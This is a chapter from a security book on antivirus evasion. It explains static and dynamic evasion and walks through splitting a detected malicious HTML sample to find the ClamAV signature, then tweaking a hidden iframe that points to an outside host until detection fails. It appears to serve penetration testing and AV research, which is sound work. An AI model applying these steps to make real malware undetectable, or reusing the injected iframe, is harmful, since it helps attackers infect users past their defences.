The Antivirus Hacker's Handbook (2015)

Part II. Antivirus Software Evasion

In This Part

1. Chapter 6: Antivirus Software Evasion

2. Chapter 7: Evading Signatures

3. Chapter 8: Evading Scanners

4. Chapter 9: Evading Heuristic Engines

5. Chapter 10: Identifying the Attack Surface

6. Chapter 11: Denial of Service

Chapter 6. Antivirus Software Evasion

Antivirus evasion techniques are used by malware writers, as well as by penetration testers and vulnerability researchers, in order to bypass one or more antivirus software applications. This ensures the payload the attacker wants to execute in the target machine or machines is not blocked by antivirus software and can perform the required actions.

Evasion techniques for bypassing antivirus software can be divided into two categories: dynamic and static. Static means that you simply want to bypass detection based on the antivirus's signature-scanning algorithms, while dynamic means that you want to bypass detection of the sample's behavior when it is executed. That is, statically, you try to bypass signature-based detection using cyclic redundancy check algorithms (CRCs), some other fuzzy hashing techniques, or cryptographic hashes by altering the binary contents of the sample, or you try changing the graph of the program so basic block- and function-based signatures can be tricked into believing the program is different. When trying to dynamically evade detection, the sample in question should change its behavior when it detects that it is running inside a sandbox or an antivirus emulator, or it could execute an instruction that the emulator does not support. It could also try to get out of the sandbox or the “safe execution” environment that is set up by the antivirus software so it can run the malicious programs without being monitored.

Therefore, to evade detection, you can use a plethora of different techniques. Some of them will be covered in the following sections, but first, you will get a brief introduction to the art of antivirus evasion.

Who Uses Antivirus Evasion Techniques?

Antivirus evasion techniques are a controversial topic. Typical questions that can be heard or read regarding this topic are: Why would anyone want to evade antivirus software if it is not for doing something bad? Isn't antivirus evasion something that only “bad guys” do? While malware writers obviously use evasion techniques to bypass antivirus detection and do harmful things, legitimate security professionals also use evasion techniques, mainly in the penetration testing field. A security professional hired to penetrate into some corporation will at some point need to bypass the detection techniques employed by the endpoint software of the target machines in order to execute, for example, a Meterpreter payload and continue the assessment. Also, evasion techniques can be used to test the antivirus solution deployed in an organization. Security professionals use antivirus software to answer questions such as the following:

· Is it possible to evade dynamic detection easily?

· Is it possible to bypass static detection by simply changing a few bits in recent malware samples or with some specific malware?

Asking and answering such questions can help organizations protect themselves against malicious attacks. In their software solutions, antivirus companies use various systems for statically and dynamically detecting both known and unknown malware (usually based on reputation systems or monitoring program execution to determine whether the behavior looks suspicious). However, and sadly, bypassing antivirus detection is usually an easy task. It often takes only a matter of minutes, or hours in cases where more than one antivirus scanner must be bypassed. In 2008, an antivirus evasion contest, called the “Race to Zero,” was held at the DefCon conference in Las Vegas. During the contest, participants were given a sample set of viruses and malicious code to modify and upload through the contest portal. The portal then used antivirus scanners to check whether the uploaded samples were detected and by which antivirus solution. The first individual or team whose newly modified sample bypassed all of the antivirus engines undetected would win that round. According to the organizers, each new round was designed to be more complex and challenging. The results: all AVs were evaded, with the single exception of a Word 97-based exploit because nobody had this software. Antivirus companies were angered and considered this contest a bad practice. Roger Thompson, CRO of AVG Technologies, reflected the view of some antivirus companies when he called it a contest for writing “more viruses.” Paul Ferguson, from Trend Micro, said that it was a bad idea to encourage hackers to take part in a contest for bypassing antivirus solutions, stating that it was “a little over the top.” Unsurprisingly, most people in the antivirus industry complained. But, despite their complaints, the contest's results showed that bypassing antivirus products is not a big challenge. Indeed, the contest was considered too easy, and it was never repeated again.

Discovering Where and How Malware Is Detected

A key part of antivirus evasion is determining how malware is detected. Is a specific sample detected via static means, using some signature, or is it detected through dynamic techniques such as monitoring behavior for suspicious actions or by a reputation system that prevents the execution of completely unknown software? If it is detected by a specific signature, what is that signature based on? Is it based on the functions imported by the portable executable (PE) sample? Is it based on the entropy of a code or data section in the sample? Or is it finding some specific string in the sample, inside one of its sections or in an embedded file within the sample? The following sections will cover some old and somewhat new tricks to determine how and where a known malware sample is detected.

Old Tricks for Determining Where Malware Is Detected: Divide and Conquer

The oldest trick for bypassing antivirus detection based on static signatures, such as CRCs or simple pattern matching, is to split the file into smaller parts and analyze all of them separately. The chunk where the detection is still being triggered is actually the part of the file you want to change to evade the antivirus software you are targeting. While this approach may appear naïve and unlikely to work most of the time, it works very well when used with checksum-based signatures or pattern matching. However, you will need to adapt this approach to the specific file format you are researching and testing against. For example, if you need to bypass the detection of a PE file, splitting it into parts is likely to help, as the antivirus kernel will surely first check whether the file is a PE. When it is split into chunks of data, it will no longer have a valid PE header; therefore, nothing will be detected. In this case, the approach you can use is similar, but instead of splitting the file into chunks, you create smaller versions of the file with increasing sizes. That's it: the first file contains the original bytes from offset 0 to byte 256, the next file contains the original bytes from offset 0 to byte 512, and so on.

When one of the newly created files is detected, you know in which chunk and at what offset it is detected. If, say, it is detected in the block at offset 2,048, you can continue splitting the file, byte by byte, until you eventually get the actual offset where the signature matches (or you can open the file in a hexadecimal editor to check whether something special appears, such as a certain byte sequence, and manually make some modifications). At that time, you know exactly which offset in the file causes the detection to trigger. You also need to guess how it is detecting your sample in that buffer. In 90 percent of cases, it will be a simple, old-fashioned static signature based on fuzzy hashing (that is, a CRC) or pattern-matching techniques, or a mix of them. In some cases, samples can be detected via their cryptographic hashes (for the entire file or for a chunk of data), most probably checking the MD5. In this case, naturally, you would only need to change a single bit in the file contents or in the specific chunk of data, and as the cryptographic hash aims to identify a file univocally, the hash will change and the sample will not be detected anymore.

Evading a Simple Signature-Based Detection with the Divide and Conquer Trick

This experiment uses a sample with the MD5 hash 8834639bd8664aca00b5599aaab833ea, detected by ClamAV as Exploit.HTML.IFrame-6. This specific malware sample is rather inoffensive as the injected iframe points to a URL that is no longer available. If you scan this file with the clamscan tool, you will see the following output:

$ clamscan -i 8834639bd8664aca00b5599aaab833ea

8834639bd8664aca00b5599aaab833ea: Exploit.HTML.IFrame-6 FOUND

----------- SCAN SUMMARY -----------

Known viruses: 3700704

Engine version: 0.98.1

Scanned directories: 0

Scanned files: 1

Infected files: 1

Data scanned: 0.01 MB

Data read: 0.01 MB (ratio 1.00:1)

Time: 5.509 sec (0 m 5 s)

As you can see, this file is detected by ClamAV. Now, you will try to bypass this detection using the technique that was just discussed. To do so, you use a small Python script that simply breaks the file into parts incrementally: it creates many smaller files, with a size incremented by 256 bytes for each file. The script is as follows:

#!/usr/bin/python

import os

import sys

import time

#-----------------------------------------------------------------------

def log(msg):

print("[%s] %s" % (time.asctime(), msg))

#-----------------------------------------------------------------------

class CSplitter:

def __init__(self, filename):

self.buf = open(filename, "rb").read()

self.block_size = 256

def split(self, directory):

blocks = len(self.buf) / self.block_size

for i in xrange(1, blocks):

buf = self.buf[:i*self.block_size]

path = os.path.join(directory, "block_%d" % i)

log("Writing file %s for block %d (until offset 0x%x)" % \

(path, i, self.block_size * i))

f = open(path, "wb")

f.write(buf)

f.close()

#-----------------------------------------------------------------------

def main(in_path, out_path):

splitter = CSplitter(in_path)

splitter.split(out_path)

#-----------------------------------------------------------------------

def usage():

print("Usage: ", sys.argv[0], "<in file> <directory>")

if __name__ == "__main__":

if len(sys.argv) != 3:

usage()

else:

main(sys.argv[1], sys.argv[2])

All right, with the sample and this small tool on hand, you execute the command python split.py file directory in order to create many smaller files with the original contents up to the current offset:

$ python split.py 8834639bd8664aca00b5599aaab833ea blocks/

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_1 for block 1

(until offset 0x100)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_2 for block 2

(until offset 0x200)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_3 for block 3

(until offset 0x300)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_4 for block 4

(until offset 0x400)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_5 for block 5

(until offset 0x500)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_6 for block 6

(until offset 0x600)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_7 for block 7

(until offset 0x700)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_8 for block 8

(until offset 0x800)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_9 for block 9

(until offset 0x900)

[Thu Dec 4 03:46:31 2014] Writing file blocks/block_10 for block 10

(until offset 0xa00)

(…more lines skipped…)

After creating the smaller files, you again execute the clamscan tool against the directory where all the new files you split are located:

$ clamscan -i blocks/block_*

blocks/block_10: Exploit.HTML.IFrame-6 FOUND

blocks/block_11: Exploit.HTML.IFrame-6 FOUND

blocks/block_12: Exploit.HTML.IFrame-6 FOUND

blocks/block_13: Exploit.HTML.IFrame-6 FOUND

blocks/block_14: Exploit.HTML.IFrame-6 FOUND

blocks/block_15: Exploit.HTML.IFrame-6 FOUND

blocks/block_16: Exploit.HTML.IFrame-6 FOUND

blocks/block_17: Exploit.HTML.IFrame-6 FOUND

blocks/block_18: Exploit.HTML.IFrame-6 FOUND

blocks/block_19: Exploit.HTML.IFrame-6 FOUND

blocks/block_2: Exploit.HTML.IFrame-6 FOUND

blocks/block_20: Exploit.HTML.IFrame-6 FOUND

blocks/block_21: Exploit.HTML.IFrame-6 FOUND

(…)

The execution output shows that the signature starts matching at the second block. The file is somewhere inside the 512 bytes. If you open the file blocks/block_2 that you just created with a hexadecimal editor, you see the following:

$ pyew blocks/block_2

0000 3C 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 6D 65 74 <html><head><met

0010 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 43 6F a http-equiv="Co

0020 6E 74 65 6E 74 2D 54 79 70 65 22 20 63 6F 6E 74 ntent-Type" cont

0030 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D 6C 3B 20 ent="text/html;

0040 63 68 61 72 73 65 74 3D 77 69 6E 64 6F 77 73 2D charset=windows-

0050 31 32 35 31 22 3E 3C 74 69 74 6C 65 3E C0 FD F0 1251"><title>…

0060 EE EF F0 E5 F1 F1 20 2D 20 D6 E5 ED F2 F0 20 E4 ...... - ..... .

0070 E5 EB EE E2 EE E9 20 EF F0 E5 F1 F1 FB 3C 2F 74 ...... ......</t

0080 69 74 6C 65 3E 3C 2F 68 65 61 64 3E 0A 3C 62 6F itle></head>.<bo

0090 64 79 20 62 67 63 6F 6C 6F 72 3D 22 23 44 37 44 dy bgcolor="#D7D

00A0 32 44 32 22 20 41 4C 49 4E 4B 3D 22 23 44 41 30 2D2" ALINK="#DA0

00B0 30 30 30 22 20 56 4C 49 4E 4B 3D 22 23 39 38 39 000" VLINK="#989

00C0 32 38 44 22 20 4C 49 4E 4B 3D 22 23 34 31 33 41 28D" LINK="#413A

00D0 33 34 22 20 4C 45 46 54 4D 41 52 47 49 4E 3D 22 34" LEFTMARGIN="

00E0 30 22 20 52 49 47 48 54 4D 41 52 47 49 4E 3D 22 0" RIGHTMARGIN="

00F0 30 22 20 54 4F 50 4D 41 52 47 49 4E 3D 22 30 22 0" TOPMARGIN="0"

0100 3E 3C 69 66 72 61 6D 65 20 73 72 63 3D 22 68 74 ><iframe src="ht

0110 74 70 3A 2F 2F 69 6E 74 65 72 6E 65 74 6E 61 6D tp://internetnam

0120 65 73 74 6F 72 65 2E 63 6E 2F 69 6E 2E 63 67 69 estore.cn/in.cgi

0130 3F 69 6E 63 6F 6D 65 32 36 22 20 77 69 64 74 68 ?income26" width

0140 3D 31 20 68 65 69 67 68 74 3D 31 20 73 74 79 6C =1 height=1 styl

0150 65 3D 22 76 69 73 69 62 69 6C 69 74 79 3A 20 68 e="visibility: h

0160 69 64 64 65 6E 22 3E 3C 2F 69 66 72 61 6D 65 3E idden"></iframe>

0170 0A 3C 54 41 42 4C 45 20 41 4C 49 47 4E 3D 22 43 .<TABLE ALIGN="C

0180 45 4E 54 45 52 22 20 56 41 4C 49 47 4E 3D 22 54 ENTER" VALIGN="T

0190 4F 50 22 20 42 4F 52 44 45 52 3D 22 30 22 20 57 OP" BORDER="0" W

01A0 49 44 54 48 3D 22 37 37 34 22 20 63 65 6C 6C 70 IDTH="774" cellp

01B0 61 64 64 69 6E 67 3D 22 30 22 20 63 65 6C 6C 73 adding="0" cells

01C0 70 61 63 69 6E 67 3D 22 30 22 20 62 67 63 6F 6C pacing="0" bgcol

01D0 6F 72 3D 22 23 44 46 44 44 44 44 22 3E 0A 3C 54 or="#DFDDDD">.<T

01E0 52 3E 0A 3C 54 44 20 57 49 44 54 48 3D 22 32 22 R>.<TD WIDTH="2"

01F0 20 72 6F 77 73 70 61 6E 3D 22 31 33 22 20 62 61 rowspan="13" ba

Notice the <iframe> tag inside this chunk of data from the original file. An educated guess is that the signature is looking for this tag and, probably, some attributes, as it seems to be a generic iframe-related signature. How can you modify the HTML tag or its respective attributes so it is not detected? First try changing from <iframe src="…" to <iframe src='…'. As simple as it looks (you are just changing from double quotes to single quotes), it may work in some cases. You first try this:

$ clamscan modified_block

modified_block: Exploit.HTML.IFrame-6 FOUND

----------- SCAN SUMMARY -----------

Known viruses: 3700704

Engine version: 0.98.1

Scanned directories: 0

Scanned files: 1

Infected files: 1

Data scanned: 0.00 MB

Data read: 0.00 MB (ratio 0.00:1)

Time: 5.581 sec (0 m 5 s)

It does not work this time. So, you try another change: what about removing that space in the style="visibility: hidden" attribute of the iframe's tag? A change as simple as the following diff output shows:

$ diff modified_block blocks/block_2

2c2

< <body bgcolor="#D7D2D2" ALINK="#DA0000" VLINK="#98928D" LINK="#413A34"

LEFTMARGIN="0" RIGHTMARGIN="0" TOPMARGIN="0"><iframe

src='http://internetnamestore.cn/in.cgi?income26" width=1 height=1

style="visibility:hidden"></iframe>

---

> <body bgcolor="#D7D2D2" ALINK="#DA0000" VLINK="#98928D" LINK="#413A34"

LEFTMARGIN="0" RIGHTMARGIN="0" TOPMARGIN="0"><iframe

src="http://internetnamestore.cn/in.cgi?income26" width=1 height=1

style="visibility: hidden"></iframe>

Another easy change, isn't it? And if you run the clamscan command-line scanner against your modified file, you see the following:

$ clamscan modified_block

modified_block: OK

----------- SCAN SUMMARY -----------

Known viruses: 3700704

Engine version: 0.98.1

Scanned directories: 0

Scanned files: 1

Infected files: 0

Data scanned: 0.00 MB

Data read: 0.00 MB (ratio 0.00:1)

Time: 5.516 sec (0 m 5 s)

The detection scanner is no longer discovering anything in your modified file. Now, all you have to do is modify the original sample, removing the space, and you are done: you just evaded detection (and, apparently, most of the iframe's generic detections of ClamAV).

Note

This technique is not really required to evade ClamAV detections. Because ClamAV is an open-source tool, you can unpack the signatures using sigtool and find the name it is detecting and the signature type for a specific kind of malware. In the previous example, you would discover a pattern in hexadecimal that matches the visibility: hidden sub-string as part of the signature. If you have the plain text signatures, it is easier to evade detection: you can check how the malware researchers decide to detect it and change the sample file so the detection scanner does not catch it anymore. It can be argued that this makes an open-source anti-malware tool less effective than a commercial solution. However, keep in mind that signatures are always distributed with antivirus products, whether they are open source or not. The only difference is that unpackers for the signatures are not distributed by the antivirus company and must be written by the person or team researching the antivirus. But, once an unpacker for the signatures of some specific antivirus product is coded, the signatures can be bypassed with the same difficulty level.

Binary Instrumentation and Taint Analysis

Binary instrumentation is the ability to monitor, at (assembly) instruction level, everything that a program is doing. Taint analysis is the ability to track and discover the flow of data, after it was read with functions such as fread or recv, and determine how that input data is influencing the code flow. Taint analysis routines, now a popular approach for program analysis, can be written using various binary instrumentation toolkits. Several binary instrumentation toolkits are freely available—such as the closed-source (with a very restrictive license) Intel PIN and the open-source DynamoRIO—and can be used to instrument a program, such as an antivirus command-line scanner. You may be tempted to implement a rather complex taint analysis module for your favorite binary instrumentation toolkit so you can trace where your inputs are used (the malware sample's bytes), how the data flows, and how it is finally detected, in an automatic and elegant way. However, this approach is highly discouraged.

There are many reasons why this approach is discouraged; some important ones are listed here:

· A file to be scanned, depending on the antivirus core, can be opened only once, a few times, or a number of times according to the number of different engines that the antivirus uses. Each antivirus engine will behave differently. Some antiviruses open a file thousands of times to analyze it.

· If a file is opened and read only once, almost all bytes in the file are touched (“tainted”) by some routine, and the number of traces you have to filter out are huge (in the order of gigabytes).

· Some antivirus engines have a bad habit of launching all signatures against all files or buffers, even when something was detected. For example, assume that an antivirus engine has 100 detection routines and launches them against the input file. When the sample is detected at, say, the fifth detection routine, the AV engine will still launch all the other 95 detection routines, making it very difficult to determine in which routine it was detected. Of course, if specific code for each antivirus engine and detection is written, then your taint analysis program will lead you to discover different code paths in the AV engine.

· The buffer read can be sent to other processes using many different methods (IPC, Unix sockets, and so on), and you may only get information back from the server telling whether or not it is infected, simply because the client-side part does not have the detection logic. In the previous example, you may need to run your binary instrumentation and taint analysis tools on both the client and the server AV programs because, in some antivirus products, there can be routines in each process (for example, light routines at client and heavy routines at server).

· To make sense of the recorded taint data coming from the taint analysis engine, you have to modify your engine to consider various methods of scanning, file I/O, and socket API usages and how the buffers are passed around inside the AV core. The taint analysis engine must be adapted for any new antivirus kernel, which usually translates into writing ugly, hard-coded workarounds for a condition that happens only with a specific antivirus engine. This approach can become very time-consuming, especially when there are a large number of AV products on the market. For instance, VirusTotal employs around 40 antivirus products, and each one works differently.

· The complexity of writing such a system, even in the hypothetical situation where most of the corner cases can be worked around and most problems can be fixed, is not worth it. Bypassing static signatures is extremely easy nowadays.

Summary

AV software evasion techniques are researched not only by malware writers but also by professional penetration testers who are hired by companies to test their infrastructures and need to bypass the deployed AV products. Evasion techniques are divided into two categories: static and dynamic.

· Static evasion techniques are achieved by modifying the contents of the input file so its hash or checksum is changed and can no longer be detected using signature-based detections.

· The malware may use dynamic evasion techniques during execution, whether in a real or emulated environment. The malware can fingerprint the AV software and change its behavior accordingly to avoid being detected.

This chapter concluded by showing two methods that can be used to help understand how malware are detected by the AV software:

· The divide and conquer technique can be used to split the malicious file in chunks and then scan each chunk separately to identify the chunk in the file that triggers the detection. Once the right file chunk is identified, then it becomes trivial to patch the input file and make it undetectable.

· Binary instrumentation and taint analysis, with libraries such as Intel PIN or DynamoRIO, can be used to track the execution of the antivirus software. For instance, when the appropriate AV component is instrumented, it would be possible to understand how the scanned input file is detected. Nonetheless, the execution traces and logs generated from dynamic binary instrumentation makes this method very tedious and time-consuming.

While this chapter paved the way for the subsequent chapters in this book part, the next chapter will cover how to bypass signature-based detections for various input file formats.